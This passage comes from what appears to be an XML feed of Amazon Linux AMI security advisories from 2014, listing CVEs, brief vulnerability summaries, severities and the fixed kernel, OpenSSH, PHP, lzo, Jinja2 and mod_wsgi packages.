The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.
1107966:
CVE-2014-4014 Kernel: possible privilege escalation in user namespace
CVE-2014-0206:
Array index error in the aio_read_events_ring function in fs/aio.c in the Linux kernel through 3.15.1 allows local users to obtain sensitive information from kernel memory via a large head value.
1094602:
CVE-2014-0206 kernel: aio: insufficient sanitization of head in aio_read_events_ring()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0206" title="" id="CVE-2014-0206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4014" title="" id="CVE-2014-4014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508" title="" id="CVE-2014-4508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4608" title="" id="CVE-2014-4608" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.48" release="55.140.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-devel-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.48" release="55.140.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.48-55.140.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-369</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-369: medium priority package update for openssh</title><issued date="2014-07-09 16:32:00" /><updated date="2014-09-19 10:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2653:
The verify_host_key function in sshconnect.c in the client in OpenSSH 6.6 and earlier allows remote servers to trigger the skipping of SSHFP DNS RR checking by presenting an unacceptable HostCertificate.
1081338:
CVE-2014-2653 openssh: failure to check DNS SSHFP records in certain scenarios
CVE-2014-2532:
sshd in OpenSSH before 6.6 does not properly support wildcards on AcceptEnv lines in sshd_config, which allows remote attackers to bypass intended environment restrictions by using a substring located before a wildcard character.
1077843:
CVE-2014-2532 openssh: AcceptEnv environment restriction bypass flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2532" title="" id="CVE-2014-2532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2653" title="" id="CVE-2014-2653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.41.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.41.amzn1" epoch="0" 
arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.41.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-8.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-370</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-370: important priority package update for chkrootkit</title><issued date="2014-07-09 16:36:00" /><updated date="2014-09-19 10:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0476:
1104455:
CVE-2014-0476 chkrootkit: local privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0476" title="" id="CVE-2014-0476" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chkrootkit" version="0.49" release="9.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chkrootkit-0.49-9.8.amzn1.x86_64.rpm</filename></package><package name="chkrootkit-debuginfo" version="0.49" release="9.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chkrootkit-debuginfo-0.49-9.8.amzn1.x86_64.rpm</filename></package><package name="chkrootkit-debuginfo" version="0.49" release="9.8.amzn1" epoch="0" arch="i686"><filename>Packages/chkrootkit-debuginfo-0.49-9.8.amzn1.i686.rpm</filename></package><package name="chkrootkit" version="0.49" release="9.8.amzn1" epoch="0" arch="i686"><filename>Packages/chkrootkit-0.49-9.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-371</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-371: medium priority package update for python-jinja2</title><issued date="2014-07-09 16:39:00" /><updated date="2014-09-19 10:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1402:
The default configuration for bccache.FileSystemBytecodeCache in Jinja2 before 2.7.2 does not properly create temporary files, which allows local users to gain privileges via a crafted .cache file with a name starting with __jinja2_ in /tmp.
1051421:
CVE-2014-1402 python-jinja2: FileSystemBytecodeCache insecure cache temporary file use
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1402" title="" id="CVE-2014-1402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-jinja2" version="2.7.2" release="2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/python-jinja2-2.7.2-2.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-372</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-372: medium priority package update for php55</title><issued date="2014-07-09 16:42:00" /><updated date="2014-09-19 10:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4049:
Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function.
1108447:
CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing
CVE-2014-3981:
acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file.
1104978:
CVE-2014-3981 php: insecure temporary file use in the configure script
CVE-2014-3515:
CVE-2014-3487:
1107544:
CVE-2014-3487 file: cdf_read_property_info insufficient boundary check
CVE-2014-3480:
1104858:
CVE-2014-3480 file: cdf_count_chain insufficient boundary check
CVE-2014-3479:
1104869:
CVE-2014-3479 file: cdf_check_stream_offset insufficient boundary check
CVE-2014-3478:
1104863:
CVE-2014-3478 file: mconvert incorrect handling of truncated pascal string size
CVE-2014-0207:
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478" title="" id="CVE-2014-3478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479" title="" id="CVE-2014-3479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480" title="" id="CVE-2014-3480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487" title="" id="CVE-2014-3487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515" title="" id="CVE-2014-3515" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3981" title="" id="CVE-2014-3981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049" title="" id="CVE-2014-4049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-gd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.14" release="1.75.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-embedded-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.14" 
release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.14" release="1.75.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-pgsql-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.14" release="1.75.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.14" release="1.75.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-opcache-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.14-1.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-373</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-373: medium priority package update for lzo</title><issued date="2014-07-09 16:45:00" /><updated date="2014-09-19 10:36:00" /><severity>medium</severity><description>Package updates are available 
for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4607:
An integer overflow flaw was found in the way the lzo library decompressed
certain archives compressed with the LZO algorithm. An attacker could
create a specially crafted LZO-compressed input that, when decompressed by
an application using the lzo library, would cause that application to crash
or, potentially, execute arbitrary code. (CVE-2014-4607)
1112418:
CVE-2014-4607 lzo: lzo1x_decompress_safe() integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4607" title="" id="CVE-2014-4607" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lzo-debuginfo" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-debuginfo-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo-devel" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-devel-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo-minilzo" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-minilzo-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo-minilzo" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-minilzo-2.08-1.5.amzn1.i686.rpm</filename></package><package name="lzo" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-2.08-1.5.amzn1.i686.rpm</filename></package><package name="lzo-debuginfo" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-debuginfo-2.08-1.5.amzn1.i686.rpm</filename></package><package name="lzo-devel" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-devel-2.08-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-374</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-374: low priority package update for python-simplejson</title><issued date="2014-07-09 16:51:00" /><updated date="2014-09-19 10:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4616:
1112285:
CVE-2014-4616 python: missing boundary check in JSON module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616" title="" id="CVE-2014-4616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-simplejson-debuginfo" version="3.5.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-simplejson-debuginfo-3.5.3-1.7.amzn1.x86_64.rpm</filename></package><package name="python-simplejson" version="3.5.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-simplejson-3.5.3-1.7.amzn1.x86_64.rpm</filename></package><package name="python-simplejson-debuginfo" version="3.5.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-simplejson-debuginfo-3.5.3-1.7.amzn1.i686.rpm</filename></package><package name="python-simplejson" version="3.5.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-simplejson-3.5.3-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-375</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-375: important priority package update for mod24_wsgi</title><issued date="2014-07-09 23:02:00" /><updated date="2014-09-19 10:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0242:
1101873:
CVE-2014-0242 mod_wsgi: information leak
CVE-2014-0240:
The mod_wsgi module before 3.5 for Apache, when daemon mode is enabled, does not properly handle error codes returned by setuid when run on certain Linux kernels, which allows local users to gain privileges via vectors related to the number of running processes.
1101863:
CVE-2014-0240 mod_wsgi: possible privilege escalation in setuid() failure scenarios
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0240" title="" id="CVE-2014-0240" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0242" title="" id="CVE-2014-0242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_wsgi-py27" version="3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-py27-3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi" version="3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi" version="3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-3.5-1.17.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.17.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-py27" version="3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-py27-3.5-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-376</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-376: important priority package update for mod_wsgi</title><issued date="2014-07-09 23:07:00" /><updated date="2014-09-19 10:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0242:
1101873:
CVE-2014-0242 mod_wsgi: information leak
CVE-2014-0240:
The mod_wsgi module before 3.5 for Apache, when daemon mode is enabled, does not properly handle error codes returned by setuid when run on certain Linux kernels, which allows local users to gain privileges via vectors related to the number of running processes.
1101863:
CVE-2014-0240 mod_wsgi: possible privilege escalation in setuid() failure scenarios
